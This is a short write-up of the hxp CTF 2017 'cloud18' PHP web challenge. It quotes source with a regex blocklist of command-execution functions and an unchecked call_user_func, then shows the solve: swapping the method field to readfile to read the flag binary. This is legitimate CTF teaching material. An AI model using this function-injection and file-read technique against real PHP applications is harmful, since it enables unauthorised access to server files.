hxp CTF 2017 - cloud18 [150]
cloud18 - 150 Points
First of all, maybe you need some reference before to solve this problem:
PHP Object Injection, Path Traversal, calluserfunction
Points: 150
Tags: web, php
Edit task details
We also did an online text editor! We also made it, like, super secure! We are so confident that we even give you the source code.
Download:
65e868ae9518a3fd226e71d4041be9d4cd8350d7552b46832f3e7f0b5d6e03af.tar.xz
Connection:
http://35.198.105.111:5475/
The connection (35.198.105.111:5475) is not available right now it is closed, because the event is done but you can download the files from CTF Time's portal from the link below the title.
Download the file and extract it.
Open the source code of editor.php
if (preg_match("/exec|system|passthru|`|proc_open|popen/", strtolower($_POST["method"].$_POST["text"])) != 0) {
exit("Do you really think you could pass something to the command line? Functions like this are often disabled! Maybe have a look at the source?");
}
From the source code editor.php, we know that the input text will be edit and do match comparing regex and return the result from function call_user_func.
$editedText = preg_replace_callback("/" . $_POST["regex"] . "/", function ($matches) {
return call_user_func($_POST["method"], $matches[0]);
}, $_POST["text"]);
if($editedText) {
echo("<div class='alert success'>" . $editedText . "</div>");
}}
Because a filtering function name, function for execute by external program can not be used. The parameter function will take from $_POST[“method”] so that, don't worry, we can do modification value of method via inspect element.
<select name="method">
<option value="" disabled selected>select a method</option>
<option value="strtoupper">to upper case</option>
<option value="strtolower">to lower case</option>
<option value="ucfirst">first letter to upper case</option>
</select>
Let's we save this for later and look to the other source code like index.php
if($_SESSION["user"]){
echo "<div class='alert success'>login sucessful</div>";
if($_SESSION["user"]->getName() === "admin"){
echo "<div class='alert success'>" . shell_exec("/usr/bin/get_flag") . "</div>";
}
}
From here we know that is the flag's path " /usr/bin/get_flag ".
Okay, now we doing the exploit.
select a method : readfile
By the name we now that it's to use for readfile from the server
enter valid regex : ^[ -~]+$
So that it can accept all input from the text box
enter your text here : /usr/bin/get_flag
You will get output from " /usr/bin/get_flag ", find a string that contain "hxp"